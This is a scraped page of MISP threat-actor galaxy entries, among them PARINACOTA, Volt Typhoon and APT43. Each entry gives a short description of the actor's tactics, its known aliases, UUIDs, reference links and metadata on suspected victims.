sources | ['https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel'] |
PARINACOTA
One actor that has emerged in this trend of human-operated attacks is an active, highly adaptive group that frequently drops Wadhrama as payload. PARINACOTA impacts three to four organizations every week and appears quite resourceful: during the 18 months that we have been monitoring it, we have observed the group change tactics to match its needs and use compromised machines for various purposes, including cryptocurrency mining, sending spam emails, or proxying for other attacks. The group’s goals and payloads have shifted over time, influenced by the type of compromised infrastructure, but in recent months, they have mostly deployed the Wadhrama ransomware. The group most often employs a smash-and-grab method, whereby they attempt to infiltrate a machine in a network and proceed with subsequent ransom in less than an hour. There are outlier campaigns in which they attempt reconnaissance and lateral movement, typically when they land on a machine and network that allows them to quickly and easily move throughout the environment. PARINACOTA’s attacks typically brute forces their way into servers that have Remote Desktop Protocol (RDP) exposed to the internet, with the goal of moving laterally inside a network or performing further brute-force activities against targets outside the network. This allows the group to expand compromised infrastructure under their control. Frequently, the group targets built-in local administrator accounts or a list of common account names. In other instances, the group targets Active Directory (AD) accounts that they compromised or have prior knowledge of, such as service accounts of known vendors. The group adopted the RDP brute force technique that the older ransomware called Samas (also known as SamSam) infamously used. Other malware families like GandCrab, MegaCortext, LockerGoga, Hermes, and RobbinHood have also used this method in targeted ransomware attacks. PARINACOTA, however, has also been observed to adapt to any path of least resistance they can utilize. For instance, they sometimes discover unpatched systems and use disclosed vulnerabilities to gain initial access or elevate privileges.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PARINACOTA.
Known Synonyms |
---|
Wine Tempest |
Internal MISP references
UUID 4245e4cd-a57a-4e0b-9853-acaa549d495d
which can be used as unique global reference for PARINACOTA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
Red Dev 17
In 2021, PwC started tracking a series of intrusions under the moniker of Red Dev 17 that they assess were highly likely conducted by a China-based threat actor. Their analysis suggests Red Dev 17 has been active since at least 2017. Red Dev 17's observed targets are mainly in India, and include the Indian military, a multinational India-based technology company, and a state energy company. They assess that it is highly probable that the threat actor behind intrusions associated with Red Dev 17 is also responsible for the campaign known in open source as Operation NightScout. Red Dev 17 is a user of the 8.t document weaponisation framework (also known as RoyalRoad), and abuses benign utilities such as Logitech or Windows Defender binaries to sideload and execute Chinoxy or PoisonIvy variants on victim systems. They identified capability and infrastructure links between Red Dev 17 and the threat actor they call Red Hariasa (aka FunnyDream APT), as well as infrastructure overlaps with Red Wendigo (aka Icefog, RedFoxtrot), and with ShadowPad C2 servers. At this time, they do not have sufficient evidence to directly link Red Dev 17 to any of these threat actors. However, They assess with realistic probability that Red Dev 17 operates within a cluster of threat actors that share tools and infrastructure, as well as a strong targeting focus on Southeast Asia and Central Asia.
Internal MISP references
UUID 50d61877-bfc7-4c65-980e-c0589b5561fa
which can be used as unique global reference for Red Dev 17
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['India'] |
cfr-target-category | ['High-Tech', 'Military', 'Energy'] |
country | CN |
Aoqin Dragon
SentinelLabs has uncovered a cluster of activity beginning at least as far back as 2013 and continuing to the present day, primarily targeting organizations in Southeast Asia and Australia. They assess that the threat actor's primary focus is espionage and relates to targets in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. We track this activity as 'Aoqin Dragon'. The threat actor has a history of using document lures with pornographic themes to infect users and makes heavy use of USB shortcut techniques to spread the malware and infect additional targets. Attacks attributable to Aoqin Dragon typically drop one of two backdoors, Mongall and a modified version of the open source Heyoka project.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Aoqin Dragon.
Known Synonyms |
---|
UNC94 |
Internal MISP references
UUID fa1fdccb-1a06-4607-bd45-1a7df4db02d7
which can be used as unique global reference for Aoqin Dragon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Australia', 'Cambodia', 'Hong Kong', 'Singapore', 'Vietnam'] |
cfr-target-category | ['Government', 'Education', 'Telecommunications'] |
country | CN |
DangerousSavanna
Malicious campaign called DangerousSavanna has been targeting multiple major financial service groups in French-speaking Africa for the last two years. The threat actors behind this campaign use spear-phishing as a means of initial infection, sending emails with malicious attachments to the employees of financial institutions in at least five different French-speaking countries: Ivory Coast, Morocco, Cameroon, Senegal, and Togo. DangerousSavanna tends to install relatively unsophisticated software tools in the infected environments. These tools are both self-written and based on open-source projects such as Metasploit, PoshC2, DWservice, and AsyncRAT. The threat actors’ creativity is on display in the initial infection stage, as they persistently pursue the employees of the targeted companies, constantly changing infection chains that utilize a wide range of malicious file types, from self-written executable loaders and malicious documents, to ISO, LNK, JAR and VBE files in various combinations. The evolving infection chains by the threat actor reflect the changes in the threat landscape seen over the past few years as infection vectors became more and more sophisticated and diverse.
Internal MISP references
UUID 1bb64526-cc51-475a-b6bc-af30df9f2fb6
which can be used as unique global reference for DangerousSavanna
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Ivory Coast', 'Morocco', 'Cameroon', 'Senegal', 'Togo'] |
threat-actor-classification | ['campaign'] |
Hezb
Hezb is a group deploying cryptominers when new exploit are available for public facing vulnerabilities. The name is after the miner process they deploy.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Hezb.
Known Synonyms |
---|
Mimo |
Internal MISP references
UUID fd82cd40-9306-4285-8fae-ad29a9711603
which can be used as unique global reference for Hezb
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
NoName057(16)
NoName057(16) is performing DDoS attacks on websites belonging to governments, news agencies, armies, suppliers, telecommunications companies, transportation authorities, financial institutions, and more in Ukraine and neighboring countries supporting Ukraine, like Ukraine itself, Estonia, Lithuania, Norway, and Poland.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NoName057(16).
Known Synonyms |
---|
05716nnm |
Nnm05716 |
NoName057 |
NoName05716 |
Internal MISP references
UUID e62937d0-dec6-4c39-a836-e43b1d138df4
which can be used as unique global reference for NoName057(16)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Czech Republic', 'Denmark', 'Estonia', 'Lithuania', 'NATO', 'Norway', 'Poland', 'Ukraine'] |
cfr-target-category | ['Financial', 'Government', 'Military', 'Telecommunications', 'Transportation'] |
cfr-type-of-incident | ['Denial of service'] |
BITWISE SPIDER
BITWISE SPIDER has recently and quickly become a significant player in the big game hunting (BGH) landscape. Their dedicated leak site (DLS) has received the highest number of victims posted each month since July 2021 compared to other adversary DLSs due to the growing popularity and effectiveness of LockBit 2.0.
Internal MISP references
UUID ecf4d7cb-9bf7-4d9d-8450-c99e885b9aac
which can be used as unique global reference for BITWISE SPIDER
in MISP communities and other software using the MISP galaxy
External references
- https://www.crowdstrike.com/blog/better-together-global-attitude-survey-takeaways-2021/ - webarchive
- https://socradar.io/lockbit-3-another-upgrade-to-worlds-most-active-ransomware/ - webarchive
- https://security.packt.com/understanding-lockbit/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-lockbit - webarchive
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
Void Balaur
Void Balaur is a highly active hack-for-hire / cyber mercenary group with a wide range of known target types across the globe. Their services have been observed for sale to the public online since at least 2016. Services include the collection of private data and access to specific online email and social media services, such as Gmail, Outlook, Telegram, Yandex, Facebook, Instagram, and business emails.
Internal MISP references
UUID ca310f0a-1131-4c67-b0a7-f1cd4ce0f87f
which can be used as unique global reference for Void Balaur
in MISP communities and other software using the MISP galaxy
External references
- https://www.sentinelone.com/labs/the-sprawling-infrastructure-of-a-careless-mercenary/ - webarchive
- https://blog.google/threat-analysis-group/countering-hack-for-hire-groups/ - webarchive
- https://documents.trendmicro.com/assets/white_papers/wp-void-balaur-tracking-a-cybermercenarys-activities.pdf - webarchive
- https://www.amnesty.org/en/latest/research/2020/03/targeted-surveillance-attacks-in-uzbekistan-an-old-threat-with-new-techniques/ - webarchive
- https://equalit.ie/deflect-labs-report-6/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Brazil', 'Central African Republic', 'Georgia', 'Kazakhstan', 'Moldova', 'Russia', 'Spain', 'Sudan', 'Taiwan', 'Ukraine', 'United Kingdom', 'United States'] |
APT-C-60
APT-C-60
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT-C-60.
Known Synonyms |
---|
APT-Q-12 |
Internal MISP references
UUID 6a83b2bf-0c51-4c9b-89b0-35df7cab1dd5
which can be used as unique global reference for APT-C-60
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
RomCom
ROMCOM is an evolving and sophisticated threat actor group that has been using the malware tool ROMCOM for espionage and financially motivated attacks. They have targeted organizations in Ukraine and NATO countries, including military personnel, government agencies, and political leaders. The ROMCOM backdoor is capable of stealing sensitive information and deploying other malware, showcasing the group's adaptability and growing sophistication.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RomCom.
Known Synonyms |
---|
Storm-0978 |
Internal MISP references
UUID ba9e1ed2-e142-48d0-a593-f73ac6d59ccd
which can be used as unique global reference for RomCom
in MISP communities and other software using the MISP galaxy
External references
- https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass - webarchive
- https://blogs.blackberry.com/en/2022/10/unattributed-romcom-threat-actor-spoofing-popular-apps-now-hits-ukrainian-militaries - webarchive
- https://www.trendmicro.com/en_us/research/23/j/void-rabisu-targets-female-leaders-with-new-romcom-variant.html - webarchive
- https://labs.k7computing.com/index.php/romcom-rat-not-your-typical-love-story/ - webarchive
- https://blogs.blackberry.com/en/2023/07/decoding-romcom-behaviors-and-opportunities-for-detection - webarchive
- https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Germany'] |
country | RU |
GOLD PRELUDE
GOLD PRELUDE is a financially motivated cybercriminal threat group that operates the SocGholish (aka FAKEUPDATES) malware distribution network. GOLD PRELUDE operates a large global network of compromised websites, frequently running vulnerable content management systems (CMS), that redirect into a malicious traffic distribution system (TDS). The TDS, which researchers at Avast have named Parrot TDS, uses opaque criteria to select victims to serve a fake browser update page. These pages, which are customized to the specific visiting browser software, download the JavaScript-based SocGholish payload frequently embedded within a compressed archive.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GOLD PRELUDE.
Known Synonyms |
---|
TA569 |
UNC1543 |
Internal MISP references
UUID 8134c96d-d6ed-49cc-99d6-fe74c0636387
which can be used as unique global reference for GOLD PRELUDE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
BazarCall
BazarCall campaigns forgo malicious links or attachments in email messages in favor of phone numbers that recipients are misled into calling. It’s a technique reminiscent of vishing and tech support scams where potential victims are being cold called by the attacker, except in BazarCall’s case, targeted users must dial the number. And when they do, the users are connected with actual humans on the other end of the line, who then provide step-by-step instructions for installing malware into their devices.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BazarCall.
Known Synonyms |
---|
BazaCall |
BazzarCall |
Internal MISP references
UUID 906e2091-cc32-499e-a799-2b9b15e45042
which can be used as unique global reference for BazarCall
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Evasive Panda
Evasive Panda is an APT group that has been active since at least 2012, conducting cyberespionage targeting individuals, government institutions and organizations.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Evasive Panda.
Known Synonyms |
---|
BRONZE HIGHLAND |
Internal MISP references
UUID 171d0590-be92-443f-addb-af5dc2a8034d
which can be used as unique global reference for Evasive Panda
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Hong Kong', 'India', 'Malaysia', 'Taiwan'] |
cfr-target-category | ['Government', 'Individuals', 'Universities'] |
cfr-type-of-incident | Espionage |
country | CN |
TAG-53
A Russia-linked threat actor tracked as TAG-53 is running phishing campaigns impersonating various defense, aerospace, and logistic companies, according to The Record by Recorded Future. Recorded Future’s Insikt Group identified overlaps with a threat actor tracked by other companies as Callisto Group, COLDRIVER, and SEABORGIUM.
Internal MISP references
UUID e5865ca1-ec95-43e2-954a-d0f3507a9747
which can be used as unique global reference for TAG-53
in MISP communities and other software using the MISP galaxy
External references
- https://blog.knowbe4.com/russian-threat-actor-impersonates-aerospace-and-defense-companies - webarchive
- https://www.recordedfuture.com/exposing-tag-53-credential-harvesting-infrastructure-for-russia-aligned-espionage-operations?utm_campaign=PostBeyond&utm_source=Twitter&utm_medium=359877&utm_term=Exposing+TAG-53%E2%80%99s+Credential+Harvesting+Infrastructure+Used+for+Russia-Aligned+Espionage+Operations - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2022-1205.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
Malteiro
This group of cybercriminals is named Malteiroby SCILabs, they operate and distribute the URSA/Mispadu banking trojan.
Internal MISP references
UUID ba57c28a-47d0-46ba-a933-9aed69f7b84f
which can be used as unique global reference for Malteiro
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
Moskalvzapoe
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Moskalvzapoe.
Known Synonyms |
---|
MAN1 |
TA511 |
Internal MISP references
UUID 66a0a3ad-5b07-4876-baee-cf44000f7470
which can be used as unique global reference for Moskalvzapoe
in MISP communities and other software using the MISP galaxy
External references
- https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618 - webarchive
- https://vixra.org/abs/1902.0257 - webarchive
- https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/ - webarchive
- https://unit42.paloaltonetworks.com/threat-brief-hancitor-actors/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
TA570
One of the most active Qbot malware affiliates, Proofpoint has tracked the large cybercrime threat actor TA570 since 2018.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TA570.
Known Synonyms |
---|
DEV-0450 |
Internal MISP references
UUID 82a808ad-3f2f-43c0-bd15-848a6e27da95
which can be used as unique global reference for TA570
in MISP communities and other software using the MISP galaxy
External references
- https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware - webarchive
- https://therecord.media/hackers-using-follina-windows-zero-day-to-spread-qbot-malware/ - webarchive
- https://isc.sans.edu/diary/TA570+Qakbot+Qbot+tries+CVE202230190+Follina+exploit+msmsdt/28728 - webarchive
- https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | RU |
Related clusters
To see the related clusters, click here.
TA575
TA575 is a Dridex affiliate tracked by Proofpoint since late 2020. This group distributes malware such as Dridex, Qakbot, and WastedLocker via malicious URLs, Office attachments, and password-protected files. On average, TA575 distributes almost 4,000 messages per campaign impacting hundreds of organizations.
Internal MISP references
UUID fbb04514-f71d-4a95-a1af-727d21ef12a2
which can be used as unique global reference for TA575
in MISP communities and other software using the MISP galaxy
External references
- https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/ta575-uses-squid-game-lures-distribute-dridex-malware - webarchive
- https://www.zdnet.com/article/ta575-criminal-group-using-squid-game-lures-for-dridex-malware/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware - webarchive
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
TA577
TA577 is a prolific cybercrime threat actor tracked by Proofpoint since mid-2020. This actor conducts broad targeting across various industries and geographies, and Proofpoint has observed TA577 deliver payloads including Qbot, IcedID, SystemBC, SmokeLoader, Ursnif, and Cobalt Strike.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TA577.
Known Synonyms |
---|
Hive0118 |
Internal MISP references
UUID e405b7d0-3eed-4f9d-9b68-728e9793974c
which can be used as unique global reference for TA577
in MISP communities and other software using the MISP galaxy
External references
- https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware - webarchive
- https://thehackernews.com/2021/06/ransomware-attackers-partnering-with.html - webarchive
- https://www.itpro.com/security/ransomware/359919/ransomware-criminals-look-to-other-hackers-to-provide-them-with-network - webarchive
- https://exchange.xforce.ibmcloud.com/threat-group/guid:1dda890fa2662ed26b451c703e922315 - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | RU |
Related clusters
To see the related clusters, click here.
TA2536
TA2536, which has been active since at least 2015, is likely Nigerian based on its unique linguistic style, tactics and tools. It uses keyloggers such as HawkEye and distinctive stylometric features in typo-squatted domains that resemble legitimate names and the use of recurring names and substrings in email addresses.
Internal MISP references
UUID 9687a6a9-0a66-4373-b546-60553857a442
which can be used as unique global reference for TA2536
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | NG |
Related clusters
To see the related clusters, click here.
DEV-0147
DEV-0147 is a China-based cyber espionage actor was observed compromising diplomatic targets in South America, a notable expansion of the group's data exfiltration operations that traditionally targeted gov't agencies and think tanks in Asia and Europe. DEV-0147 is known to use tools like ShadowPad, a remote access trojan associated with other China-based actors, to maintain persistent access, and QuasarLoader, a webpack loader, to deploy additional malware. DEV-0147's attacks in South America included post-exploitation activity involving the abuse of on-premises identity infrastructure for recon and lateral movement, and the use of Cobalt Strike for command and control and data exfiltration.
Internal MISP references
UUID 85f20141-1c8e-49ac-b963-eaa1fb1f4018
which can be used as unique global reference for DEV-0147
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['South America', 'Asia', 'European Union'] |
country | CN |
TA406
TA406 is engaging in malware distribution, phishing, intelligence collection, and cryptocurrency theft, resulting in a wide range of criminal activities.
Internal MISP references
UUID 89f005f9-22e9-4c50-9b48-e94c521266e5
which can be used as unique global reference for TA406
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['China', 'France', 'Germany', 'India', 'Japan', 'North America', 'Russia', 'South Africa', 'South Korea', 'United Kingdom'] |
cfr-target-category | ['Government', 'Journalists', 'NGOs'] |
country | KR |
Related clusters
To see the related clusters, click here.
APT42
Iranian state-sponsored cyber espionage group tasked with conducting information collection and surveillance operations against individuals and organizations of strategic interest to the Iranian government.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT42.
Known Synonyms |
---|
CALANQUE |
UNC788 |
Internal MISP references
UUID 35f887ad-6709-4d0b-8e9c-6b3fa09c783f
which can be used as unique global reference for APT42
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['Australia', 'Europe', 'Israel', 'Middle East', 'US'] |
cfr-target-category | ['Education', 'Government', 'Military', 'Defense', 'Energy', 'Finance', 'Healthcare', 'Pharmaceuticals', 'Civil Society', 'Legal', 'Manufacturing', 'Media', 'NGOs', 'Pharmaceuticals'] |
cfr-type-of-incident | Espionage |
country | IR |
Related clusters
To see the related clusters, click here.
TA453
TA453 has employed the use of compromised accounts, malware, and confrontational lures to go after targets with a range of backgrounds from medical researchers to realtors to travel agencies.
Internal MISP references
UUID c1d44f44-425e-48fd-b78b-84b988da8bc3
which can be used as unique global reference for TA453
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Related clusters
To see the related clusters, click here.
Chamelgang
In Q2 2021, the PT Expert Security Center incident response team conducted an investigation in an energy company. The investigation revealed that the company's network had been compromised by an unknown group for the purpose of data theft. They gave the group the name ChamelGang (from the word "chameleon"), because the group disguised its malware and network infrastructure under legitimate services of Microsoft, TrendMicro, McAfee, IBM, and Google.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Chamelgang.
Known Synonyms |
---|
CamoFei |
Internal MISP references
UUID eafdd27f-a3e2-4bb1-ae03-bf9ca5ff0355
which can be used as unique global reference for Chamelgang
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['India', 'Japan', 'Nepal', 'Russia', 'Taiwan', 'US'] |
cfr-target-category | ['Aviation', 'Energy'] |
Related clusters
To see the related clusters, click here.
Karakurt
Karakurt actors have employed a variety of tactics, techniques, and procedures (TTPs), creating significant challenges for defense and mitigation. Karakurt victims have not reported encryption of compromised machines or files; rather, Karakurt actors have claimed to steal data and threatened to auction it off or release it to the public unless they receive payment of the demanded ransom. Known ransom demands have ranged from $25,000 to $13,000,000 in Bitcoin, with payment deadlines typically set to expire within a week of first contact with the victim.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Karakurt.
Known Synonyms |
---|
Karakurt Lair |
Internal MISP references
UUID 035fbd5c-e4a1-4c7b-80fb-f5a89a361aed
which can be used as unique global reference for Karakurt
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Canada', 'Germany', 'United Kingdom', 'United States'] |
cfr-type-of-incident | Extortion |
Related clusters
To see the related clusters, click here.
DEV-0270
Microsoft threat intelligence teams have been tracking multiple ransomware campaigns and have tied these attacks to DEV-0270, also known as Nemesis Kitten, a sub-group of Iranian actor PHOSPHORUS. Microsoft assesses with moderate confidence that DEV-0270 conducts malicious network operations, including widespread vulnerability scanning, on behalf of the government of Iran.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DEV-0270.
Known Synonyms |
---|
Nemesis Kitten |
Storm-0270 |
Internal MISP references
UUID 7b90319a-9f7b-466d-9f90-7fcc270ed505
which can be used as unique global reference for DEV-0270
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Related clusters
To see the related clusters, click here.
Prophet Spider
PROPHET SPIDER is an eCrime actor, active since at least May 2017, that primarily gains access to victims by compromising vulnerable web servers, which commonly involves leveraging a variety of publicly disclosed vulnerabilities. The adversary has likely functioned as an access broker — handing off access to a third party to deploy ransomware — in multiple instances.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Prophet Spider.
Known Synonyms |
---|
GOLD MELODY |
UNC961 |
Internal MISP references
UUID eb0b100c-8a4e-4859-b6f8-eebd66c3d20c
which can be used as unique global reference for Prophet Spider
in MISP communities and other software using the MISP galaxy
External references
- https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/ - webarchive
- https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/ - webarchive
- https://www.secureworks.com/research/gold-melody-profile-of-an-initial-access-broker - webarchive
- https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated - webarchive
Associated metadata
Metadata key | Value |
---|---|
country |
Related clusters
To see the related clusters, click here.
TA866
According to Proofpoint, TA866 is a newly identified threat actor that distributes malware via email utilizing both commodity and custom tools. While most of the activity observed occurred since October 2022, Proofpoint researchers identified multiple activity clusters since 2019 that overlap with TA866 activity. Most of the activity recently observed by Proofpoint suggests recent campaigns are financially motivated, however assessment of historic related activities suggests a possible, additional espionage objective.
Internal MISP references
UUID a3c22f46-5135-4b39-a33f-92906ac12c31
which can be used as unique global reference for TA866
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
motive | mainly financially motivated, additional espionage objective. |
Related clusters
To see the related clusters, click here.
Anonymous Sudan
Since January 23, 2023, a threat actor identifying as "Anonymous Sudan" has been conducting denial of service (DDoS) attacks against multiple organizations in Sweden. This group claims to be "hacktivists," politically motivated hackers from Sudan. According to Truesec’s report, the threat actor has nothing to do with the online activists collectively known as Anonymous.
Internal MISP references
UUID 8ca38564-5515-45f5-9f3b-a4091546e10b
which can be used as unique global reference for Anonymous Sudan
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Denmark', 'Sweden'] |
cfr-type-of-incident | ['Denial of service'] |
RedGolf
Recorded Future’s Insikt Group has identified a large cluster of new operational infrastructure associated with use of the custom Windows and Linux backdoor KEYPLUG. We attribute this activity to a threat activity group tracked as RedGolf, which is highly likely to be a Chinese state-sponsored group. RedGolf closely overlaps with threat activity reported in open sources under the aliases APT41/BARIUM and has likely carried out state-sponsored espionage activity in parallel with financially motivated operations for personal gain from at least 2014 onward.
Internal MISP references
UUID eff0c059-5449-4207-9860-715475139595
which can be used as unique global reference for RedGolf
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-state-sponsor | China |
cfr-target-category | ['Aviation', 'Automotive', 'Education', 'Intergovernmental', 'Media and Entertainment', 'Information Technology', 'Religious Organizations'] |
country | CN |
motive | state-sponsored espionage and financially motivated |
Related clusters
To see the related clusters, click here.
APT43
• APT43 is a prolific cyber operator that supports the interests of the North Korean regime. The group combines moderately-sophisticated technical capabilities with aggressive social engineering tactics, especially against South Korean and U.S.-based government organizations, academics, and think tanks focused on Korean peninsula geopolitical issues. • In addition to its espionage campaigns, we believe APT43 funds itself through cybercrime operations to support its primary mission of collecting strategic intelligence. • The group creates numerous spoofed and fraudulent personas for use in social engineering, as well as cover identities for purchasing operational tooling and infrastructure. • APT43 has collaborated with other North Korean espionage operators on multiple operations, underscoring the major role APT43 plays in the regime’s cyber apparatus.
Internal MISP references
UUID aac49b4e-74e9-49fa-84f9-e340cf8bafbc
which can be used as unique global reference for APT43
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Hagga
Hagga is believed to have been using Agent Tesla, 2021’s sixth most prevalent malware, to steal sensitive information from his victims since the latter part of 2021.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Hagga.
Known Synonyms |
---|
Aggah |
TH-157 |
Internal MISP references
UUID 1e318d85-79c7-4988-83b7-ff86a974786c
which can be used as unique global reference for Hagga
in MISP communities and other software using the MISP galaxy
External references
- https://www.team-cymru.com/post/an-analysis-of-infrastructure-linked-to-the-hagga-threat-actor - webarchive
- https://otx.alienvault.com/pulse/62cfe4ef3415be5f83be81d1 - webarchive
- https://team-cymru.com/blog/2022/07/12/an-analysis-of-infrastructure-linked-to-the-hagga-threat-actor/ - webarchive
- https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
Volt Typhoon
[Microsoft] Volt Typhoon, a state-sponsored actor based in China that typically focuses on espionage and information gathering. Microsoft assesses with moderate confidence that this Volt Typhoon campaign is pursuing development of capabilities that could disrupt critical communications infrastructure between the United States and Asia region during future crises.
[Secureworks] BRONZE SILHOUETTE likely operates on behalf the PRC. The targeting of U.S. government and defense organizations for intelligence gain aligns with PRC requirements, and the tradecraft observed in these engagements overlap with other state-sponsored Chinese threat groups.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Volt Typhoon.
Known Synonyms |
---|
BRONZE SILHOUETTE |
Dev-0391 |
Insidious Taurus |
Storm-0391 |
UNC3236 |
VANGUARD PANDA |
VOLTZITE |
Internal MISP references
UUID f02679fa-5e85-4050-8eb5-c2677d93306f
which can be used as unique global reference for Volt Typhoon
in MISP communities and other software using the MISP galaxy
External references
- https://www.secureworks.com/blog/chinese-cyberespionage-group-bronze-silhouette-targets-us-government-and-defense-organizations - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/ - webarchive
- https://unit42.paloaltonetworks.com/volt-typhoon-threat-brief/ - webarchive
- https://www.dragos.com/threat/voltzite/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
SmugX
The campaign, called SmugX, overlaps with previously reported activity by Chinese APT actors RedDelta and Mustang Panda. Although those two correlate to some extent with Camaro Dragon, there is insufficient evidence to link the SmugX campaign to the Camaro Dragon group.
The campaign uses new delivery methods to deploy (most notably – HTML Smuggling) a new variant of PlugX, an implant commonly associated with a wide variety of Chinese threat actors. Although the payload itself remains similar to the one found in older PlugX variants, its delivery methods results in low detection rates, which until recently helped the campaign fly under the radar.
Internal MISP references
UUID c95520c1-0a27-42aa-9853-bf5f0f3bc074
which can be used as unique global reference for SmugX
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
RedDelta
